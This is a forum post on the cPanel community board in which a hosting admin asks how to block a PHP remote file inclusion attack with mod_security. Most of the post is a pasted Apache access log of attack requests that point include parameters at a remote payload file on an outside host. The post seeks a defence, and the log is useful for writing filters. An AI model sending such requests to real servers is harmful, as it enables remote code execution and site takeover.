The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Anybody know how to block this specific PHP Inject attack using Mod_Security ?

Discussion in 'Security' started by smksa, Jun 16, 2008.

  1. smksa

    smksa Member

    Joined:
    Aug 1, 2006
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    I would like to request an assistant.

    Anybody know how to block the following "WEB-PHP remote include path" attack using mod_security.

    I have tried using Default Mod_Securty and also Mod_security from
    http://www.timmit.nl/modsec2.user.conf.

    But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server. :confused:

    The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.


    =================================

    127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
    124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
    124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

    ====================================



    Appreciates if anybody can help to stop this attack.

    Thank you,

    Regards,
    Sham
     
Loading...

Share This Page